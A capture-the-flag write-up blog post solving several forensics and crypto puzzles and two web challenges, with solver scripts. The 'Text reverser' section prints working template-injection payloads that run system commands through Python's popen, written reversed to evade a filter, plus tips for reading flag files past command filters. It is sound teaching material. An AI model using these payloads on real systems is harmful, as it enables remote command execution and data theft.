CBC-DAS

difficult (for me)

Posted by JBNRZ on 2022-09-21
Estimated Reading Time 9 Minutes
Words 1.8k In Total

Misc

easy_keyboard

Solution (approach)

  1. Download the attachment and write a script:

```python
import re

# Each line of secret.Q records one keystroke as: KeyDown "<key name>"
key_pattern = re.compile('KeyDown "(.*?)"')
with open('secret.Q', 'r') as r:
    content = r.readlines()

a = []
for i in content:
    b = re.findall(key_pattern, i)
    if b:
        a.append(b[0].lower())
print(a)

# Join the key names and map the special keys to text
a = ''.join(a)
a = a.replace('shift', '').replace("backspace", '\b').replace('space', ' ').replace('num ', '')
print(a)
```
  2. The output obtained:

```
if you want to decrypt the zip file.you need to get the key.i am a very good person.
so i will give you the key directly.the key is very easy.
as long as you get the key and you can see the files in the compressed zip
.fine1it's time to give you the key.the key is 123456.
oh1sorry.this is the key of my bank card password.
the true key is 6e187bef.the key is 6e187bef.the key is 64187bef
```
  3. Then I got stuck, because the backspaced content had simply been dropped.
  4. Rewrote the script so that backspace is not replaced:

```
if you want to decrypt the zip file.you need to geyt  t the key.
i am a very good person.so i i will give you the key dirte ectly.
the key is very easy.
as long as you get the key and you can see the files in the compressed zu ip.
fine1it's time to give you the key.the key is 123456.oh1 sorr sorry.
this is the key of my vba banc k card password.
the ture t rue key is 6e187bef.
the key2 is 323d1a4b 6e187bef.
the key3 is f 0 6 7 e c 9 4 64187bef
```
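The point the two scripts above circle around is that Backspace is an edit, not a character: dropping it (first script) or emitting a literal `\b` (second script) both corrupt the reconstructed text. The following is an added example, not code from the writeup, that replays the keystrokes with the edits applied; the `KeyDown "..."` format is the one described above, and the sample log is constructed.

```python
import re

# One keystroke per line, in the format secret.Q used: KeyDown "<key name>"
KEY_RE = re.compile(r'KeyDown "(.*?)"')

# Constructed sample log in that format (not the challenge file): the typist
# writes "keu", corrects it with Backspace, then presses two numpad keys.
SAMPLE_LOG = """\
KeyDown "Shift"
KeyDown "T"
KeyDown "h"
KeyDown "e"
KeyDown "Space"
KeyDown "k"
KeyDown "e"
KeyDown "u"
KeyDown "Backspace"
KeyDown "y"
KeyDown "Space"
KeyDown "Num 4"
KeyDown "Num 2"
"""

def parse_keys(log_text):
    """Return the key names in the order they were pressed."""
    return [m.group(1) for m in KEY_RE.finditer(log_text)]

def replay(keys):
    """Rebuild the typed text by simulating the editing keys: Backspace
    deletes the last buffered character (the edit lost when the key is
    dropped or emitted as a literal \\b), Shift adds no text, "Num N" is
    numpad digit N, other multi-character names (Enter, F1) are ignored."""
    buf = []
    for key in keys:
        name = key.lower()
        if name == 'backspace':
            if buf:                 # Backspace on an empty buffer is a no-op
                buf.pop()
        elif name == 'space':
            buf.append(' ')
        elif name.startswith('num '):
            buf.append(name[4:])
        elif len(key) == 1:
            buf.append(key)         # ordinary character key
    return ''.join(buf)

def reconstruct(log_text):
    return replay(parse_keys(log_text))
```

Run on the real log, this yields the corrected sentences directly instead of the "geyt  t the" fragments shown above.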
  5. This gives three passwords:

6e187bef
323d1a4b
f067ec94

  6. And then I was stuck again.
  7. Learned something new: these three 4-byte values are probably the internal keys of a ZIP known-plaintext attack, and ARCHPR can recover the password from them.
    [image: key 1]
  8. Extracting yields a USB capture; extract the traffic (also new to me, taken from the official writeup):

```shell
tshark -r keyboard.pcapng -T fields -e usbhid.data > usbdata.txt
```

In the resulting usb.txt the values are 4f, 50, 51, 52, which are outside the usual keyboard key range, so I looked up the keyboard key codes at https://max.book118.com/html/2017/0407/99227972.shtm and found that they correspond to the arrow keys:

```
→↓←↓→ ↓→↑↓↓ ↓→↑↓↓ →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓↓ →↓↓ ↓↓ →↓↓ →↓↓ ↓↓ →↓←→↓← →↓←↓→↑←↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓ →↓↓↑←↑ →↓↓←↑↑ →↓←↓→ →↓↓←↑↑ ↓↓→↑← →←↓→↓← →↓↓←↑↑ ↓→↑↓↓ →↓←→↓← →←↓→↓← →↓←↓→↑←↑ →↓←↓→↑←↑ →←↓→↓← →←↓→↓← ↓↓ →↓←↓→ →↓←↓→↑←↑ →↓←→↓← →↓↓↑←↑ →↓↓↑←↑ →←↓→↓← ↓↓ ↓↓→↑← →↓←→↓← →↓↓←↑↑ →↓↓↑←↑ →↓←↓→↑←↑ ↓↓→↑← →↓←↓→ ↓→↑↓↓ →↓←↓→↑←↑ ↓↓→↑← ↓↓ ↓↓→↑← →↓↓ →↓←↓→↑←↑ →↓↓↑←↑ ↓↓ →←↓→↓← →↓↓↑←↑ →↓↓↑←↑ →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓↓←↑↑ →↓↓ ↓→↑↓↓ →↓←→↓← →↓↓↑←↑ ↓↓→↑← ↓→↑↓↓ →↓←↓→↑←↑ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓↑←↑ →↓←↓→↑←↑ →↓←→↓← ↓→↑↓↓ ↓↓→↑← →↓←→↓← ↓→↑↓↓ ↓↓ →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓←→↓← →←↓→↓← →↓↓←↑↑ ↓↓→↑← →↓←↓→↑←↑ →↓←↓→ →↓←↓→↑←↑ →↓↓↑←↑ ↓→↑↓↓ →↓←↓→ →↓←↓→↑←↑ ↓↓→↑← →↓↓←↑↑ →↓↓ →↓↓←↑↑ →↓↓←↑↑ ↓↓→↑← ↓→↑↓↓ →↓↓←↑↑ ↓↓→↑← →↓←→↓← →↓↓
```
  9. Exploit script (exp):

```python
from PIL import Image

# Hex dump of the usbhid.data field: 4f/50/51/52 are the right/left/down/up
# arrow keys and 00 separates one drawn digit from the next
hexdata = "4f5150514f00514f52515100514f525151004f50514f5150004f5151525052004f5150514f5250520051514f5250004f5151004f5151005151004f5151004f5151005151004f51504f5150004f5150514f5250520051514f5250004f5150514f525052004f5151004f5151525052004f5151505252004f5150514f004f51515052520051514f5250004f50514f5150004f515150525200514f525151004f51504f5150004f50514f5150004f5150514f525052004f5150514f525052004f50514f5150004f50514f5150005151004f5150514f004f5150514f525052004f51504f5150004f5151525052004f5151525052004f50514f51500051510051514f5250004f51504f5150004f5151505252004f5151525052004f5150514f5250520051514f5250004f5150514f00514f525151004f5150514f5250520051514f52500051510051514f5250004f5151004f5150514f525052004f5151525052005151004f50514f5150004f5151525052004f5151525052004f51515052520051514f5250004f5150514f525052004f5151505252004f515100514f525151004f51504f5150004f51515250520051514f525000514f525151004f5150514f525052004f5151505252004f51504f5150004f50514f5150004f5151525052004f5150514f525052004f51504f515000514f5251510051514f5250004f51504f515000514f525151005151004f5151505252004f5151004f5151505252004f51504f5150004f50514f5150004f51515052520051514f5250004f5150514f525052004f5150514f004f5150514f525052004f515152505200514f525151004f5150514f004f5150514f5250520051514f5250004f5151505252004f5151004f5151505252004f51515052520051514f525000514f525151004f51515052520051514f5250004f51504f5150004f515100"
img = Image.new('RGB', (len(hexdata), len(hexdata)))
i = 0          # current x position
j = 5          # current y position
print(len(hexdata))
for n in range(len(hexdata) // 2 - 1):
    byte = hexdata[n*2:(n+1)*2]
    print(byte)
    if byte == '4f':        # right arrow: draw 6 px to the right
        for k in range(6):
            i += 1
            img.putpixel((i, j), (255, 255, 255))
    if byte == '51':        # down arrow
        for k in range(6):
            j += 1
            img.putpixel((i, j), (255, 255, 255))
    if byte == '50':        # left arrow
        for k in range(6):
            i -= 1
            img.putpixel((i, j), (255, 255, 255))
    if byte == '52':        # up arrow
        for k in range(6):
            j -= 1
            img.putpixel((i, j), (255, 255, 255))
    if byte == '00':        # separator: start the next digit 10 px to the right
        j = 5
        i = i + 10
img.show()
```

2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637

```python
from libnum import n2s

# The decimal number read off the drawn digits, converted back to bytes
flag = 2445986771771386879020650435885512839951630986248616789159906807439648035983463410703506828942860700640637
print(n2s(flag))
```

Another exploit script:

```python
import libnum

f = open("keyboard.pcapng", "rb").read()
# Offset of the first USB HID packet in the capture; every packet block is
# 0x80 bytes long and the key code sits 57 bytes into the block
pos = 1340
# Each digit is drawn as a path of arrow keys, written in numpad notation
# (8 = up, 2 = down, 4 = left, 6 = right)
draws = ["622488", "22", "62426", "624624", "26822", "642624", "22684", "622", "62426848", "622848"]
chars = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"]
c = ""
while pos < len(f):
    data = f[pos + 57]
    if data == 0x52:
        c += "8"
    elif data == 0x51:
        c += "2"
    elif data == 0x50:
        c += "4"
    elif data == 0x4f:
        c += "6"
    elif data == 0:
        c += " "        # an empty report separates two digits
    pos += 0x80
c = c.split(" ")[:-1]
ans = ""
for i in c:
    ans += chars[draws.index(i)]
print(libnum.n2s(int(ans)))
```

what_is_it.piz

Solution (approach)

  1. Download the attachment and open it in 010 Editor.
  2. The .piz extension suggests a reversed zip, so write a script to restore it:

```python
b = []
a = ...  # the hex data exported from 010 Editor
for i in a:
    b.append(i)
# Reverse the sequence
c = []
for i in range(len(b)):
    c.append(b[len(b) - i - 1])
with open('a.txt', 'w') as w:
    w.write(''.join(c))
# then import the result back into 010 Editor
```
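An added example (not the writeup's code) doing the same restoration on raw bytes, which avoids the nibble swap that reversing a hex string character by character causes, and which strips the 00 padding that the next step deletes by hand. The sample blob is constructed, and the file names in `restore_file` are assumed.

```python
ZIP_MAGIC = b'PK\x03\x04'   # signature of a ZIP local file header

# Constructed sample (not the challenge file): a small ZIP-like blob written
# backwards, with two NUL bytes of padding appended, the layout described above.
FORWARD = ZIP_MAGIC + b'\x14\x00\x00\x00\x08\x00payload'
PIZ_SAMPLE = FORWARD[::-1] + b'\x00\x00'


def restore_piz(data):
    """Undo the reversal at the byte level and drop the leading padding.

    Reversing a hex *string* character by character also swaps the two
    nibbles of every byte ("504b" for "PK" becomes "b405"), so the work is
    done on bytes.  Anything before the first PK signature is the padding
    that trailed the reversed file; it is removed so the archive starts at
    its local file header.
    """
    if not isinstance(data, (bytes, bytearray)):
        raise TypeError('expected raw bytes, not a hex string')
    forward = bytes(data[::-1])
    start = forward.find(ZIP_MAGIC)
    if start < 0:
        raise ValueError('no ZIP local file header found after reversal')
    return forward[start:]


def restore_file(src='what_is_it.piz', dst='restored.zip'):
    """Read the reversed attachment and write the repaired archive (assumed names)."""
    with open(src, 'rb') as fh:
        fixed = restore_piz(fh.read())
    with open(dst, 'wb') as out:
        out.write(fixed)
    return len(fixed)
```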
  3. Delete the extra 00 bytes in front of the file header to get a valid file.
  4. It unzips to a Word document; change the archive's extension to .doc.
  5. Opening it shows a song; search for the original lyrics, compare, and pick out the letters missing from the misspelled words:

hylqeygvs

  6. The challenge hint says the order of the letters has to be brute-forced.
  7. Official exploit:

```python
from string import ascii_uppercase as uppercase
from itertools import cycle
import hashlib

# table[K] is the alphabet rotated to start at K (one Vigenère row)
table = dict()
for ch in uppercase:
    index = uppercase.index(ch)
    table[ch] = uppercase[index:] + uppercase[:index]

# deTable maps a key letter to the letter that undoes it (A->A, B->Z, C->Y, ...)
deTable = {'A': 'A'}
start = 'Z'
for ch in uppercase[1:]:
    index = uppercase.index(ch)
    deTable[ch] = chr(ord(start) + 1 - index)


def deKey(key):
    return ''.join([deTable[i] for i in key])


def encrypt(plainText, key):
    result = []
    # a cycle object lets the key letters repeat
    currentKey = cycle(key)
    for ch in plainText:
        if 'A' <= ch <= 'Z':
            index = uppercase.index(ch)
            # fetch the next key letter
            ck = next(currentKey)
            result.append(table[ck][index])
        else:
            result.append(ch)
    return ''.join(result)


key = "TREX"
keys = deKey(key)


def Pailie(list1, start, end):
    # enumerate every permutation of list1 by swapping in place
    if start == end:
        q = "".join(list1)
        ans = encrypt(q, keys)
        # print(ans)
        flag = hashlib.md5(ans.encode()).hexdigest()
        if "5613a" in flag[0:5]:
            print(flag)
    else:
        for i in range(start, end + 1):
            list1[start], list1[i] = list1[i], list1[start]
            Pailie(list1, start + 1, end)
            list1[start], list1[i] = list1[i], list1[start]


mw = ['H', 'Y', 'L', 'E', 'V', 'S', 'G', 'Q', 'Y']
Pailie(mw, 0, len(mw) - 1)
```

mask

  1. Open the zip in a hex editor; there is a RAR archive at the end of the file.
    [image: mask 1]
  2. Extract the RAR; it contains the rules of the custom mask patterns:
```
mask0: (i+j) % 2
mask1: j % 2
mask2: i % 3
mask3: (i+j) % 3
mask4: (i//3+j//2) % 2
mask5: (i*j) % 3 + (i*j) % 2
mask6: ((i*j) % 3 + i*j) % 2
mask7: ((i*j) % 3 + i + j) % 2
mask8: (i*j) % 2
mask9: (i*j) % 3
mask10: (i^j) % 3
mask11: (i^j) % 2
mask12: (i//3+j//2) % 3
mask13: (i^j) % 3 + (i^j) % 2
mask14: ((i^j) % 3 + i^j) % 2
mask15: ((i^j) % 3 + i + j) % 2
```

These are the 16 redefined masks. The first 8 are the original mask formulas, only in a different order, so when you scan all the QR codes you may find that some still scan directly: those happened to be randomly assigned their own original mask during generation.
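To make the table concrete, here is an added example (not from the writeup or the challenge) that turns the 16 rules into callables and applies them to a module matrix; it also compares the first eight against the QR specification's mask patterns and finds that, once i is read as the column and j as the row, they coincide in the same order. The flip condition (invert where the rule is 0) is assumed from the standard masks, since the archive gives only the formulas.

```python
# The 16 custom mask rules from the extracted RAR, with i the column (x) and
# j the row (y) of a module.  As with the standard QR masks, a module is
# inverted where the rule evaluates to 0 (assumption: the archive gave only
# the formulas).  Precedence is Python's, so in mask14 '+' binds before '^'.
MASKS = [
    lambda i, j: (i + j) % 2,
    lambda i, j: j % 2,
    lambda i, j: i % 3,
    lambda i, j: (i + j) % 3,
    lambda i, j: (i // 3 + j // 2) % 2,
    lambda i, j: (i * j) % 3 + (i * j) % 2,
    lambda i, j: ((i * j) % 3 + i * j) % 2,
    lambda i, j: ((i * j) % 3 + i + j) % 2,
    lambda i, j: (i * j) % 2,
    lambda i, j: (i * j) % 3,
    lambda i, j: (i ^ j) % 3,
    lambda i, j: (i ^ j) % 2,
    lambda i, j: (i // 3 + j // 2) % 3,
    lambda i, j: (i ^ j) % 3 + (i ^ j) % 2,
    lambda i, j: ((i ^ j) % 3 + i ^ j) % 2,
    lambda i, j: ((i ^ j) % 3 + i + j) % 2,
]

# The eight mask patterns of the QR specification, as rules of (row, col).
STANDARD = [
    lambda r, c: (r + c) % 2,
    lambda r, c: r % 2,
    lambda r, c: c % 3,
    lambda r, c: (r + c) % 3,
    lambda r, c: (r // 2 + c // 3) % 2,
    lambda r, c: (r * c) % 2 + (r * c) % 3,
    lambda r, c: ((r * c) % 2 + (r * c) % 3) % 2,
    lambda r, c: ((r + c) % 2 + (r * c) % 3) % 2,
]


def apply_mask(modules, k):
    """Return a copy of the 0/1 matrix modules[row][col] with mask k applied.
    Applying the same mask twice restores the input, so this also unmasks."""
    return [[bit ^ (MASKS[k](c, r) == 0) for c, bit in enumerate(row)]
            for r, row in enumerate(modules)]


def same_as_standard(k, size=21):
    """True if custom mask k inverts exactly the modules standard mask k does."""
    return all((MASKS[k](c, r) == 0) == (STANDARD[k](r, c) == 0)
               for r in range(size) for c in range(size))
```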

  3. Put any of the QR code PNGs into StegSolve; traces of steganography appear in the top-left corner of the red plane, bit 0.
    [image: mask 2]

Looking at a few more images, only the first four cells carry hidden data. Together with the description saying that the mask's identifying feature is not in the QR code region, these 4 bits of data must be the feature bits of the 16 masks…
[image: mask 3]
I did not understand this at all; I will write it up myself once I have learned it.

web

小恐龙 (Little Dinosaur)

Solution

(the only one I solved [crying])

  1. Open the page and view the source; there is some JS file. Format the code and read it.
  2. Find a few variables:

salt (and another one I forgot)
the sn() function

  3. sn turns out to be the function that generates the POST parameter, so copy it straight into the console.
  4. Run sn(1000000, 'salt + (the part I forgot) + 1000000').
  5. Get the flag.

Text reverser

Solution

  1. It should be SSTI. There are lots of filters, but they only check the raw data we send, not the string after it has been reversed on the server side, so passing in the reversed payload bypasses them.
  2. Run it:

```python
output = '''{% print "".__class__.__bases__[0].__subclasses__()%}'''[::-1]
print(output)
```

```
}%)(__sessalcbus__.]0[__sesab__.__ssalc__."" tnirp %{
```
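The bug here is a filter that inspects the request body but not the value that actually reaches the template engine. The following is an added example (not the challenge's code; the blocked-token list is constructed) that models the vulnerable check beside a hardened one which validates the string in the form that will be rendered.

```python
import re

# Tokens a template-injection filter of the kind described above might reject.
# Constructed list, not the challenge's rules; note that none is a palindrome,
# so reversing a payload hides every one of them from a check on the raw input.
BLOCKED = re.compile(r"\{\{|\{%|__class__|__subclasses__|__globals__|popen")

# The page's reversed payload: in the form the client sends it, no token matches.
REVERSED_INPUT = '''{% print "".__class__.__bases__[0].__subclasses__()%}'''[::-1]


def vulnerable_check(raw):
    """Filters the request body, then reverses it for rendering (the bug):
    the string handed to the template engine was never inspected."""
    if BLOCKED.search(raw):
        return None                     # request rejected
    return raw[::-1]                    # this is what gets rendered


def hardened_check(raw):
    """Filters the value in the exact form the template engine will see.

    A denylist remains a second line of defence only: the real fix is to
    render a fixed template and pass the reversed text in as a variable,
    so user input is never treated as template source at all.
    """
    rendered_form = raw[::-1]
    if BLOCKED.search(raw) or BLOCKED.search(rendered_form):
        return None
    return rendered_form
```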

  3. Send the reversed payload to get the list of classes, then paste the returned list into a script to look for a usable class:

```python
a = """
<class 'type'>...<class 'unicodedata.UCD'>
"""

# Split the pasted list into one entry per <class '...'> item
allList = []
result = ""
for i in a:
    if i == ">":
        result += i
        allList.append(result)
        result = ""
    elif i == "\n" or i == ",":
        continue
    else:
        result += i

# Print the index of the class whose globals expose popen
for k, v in enumerate(allList):
    if "os._wrap_close" in v:
        print(str(k) + "--->" + v)
```

  4. Then use the popen method to execute system commands:
    {% print "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('ls').read()%}
    }%)(daer.)'galf/ ln'(]'nepop'[__slabolg__.__tini__.]231[)(__sessalcbus__.]0[__sesab__.__ssalc__."" tnirp %{
  5. Many file-reading commands are filtered here; nl can be used to get around the filter and read the file (later tests showed that grep and rev also work).
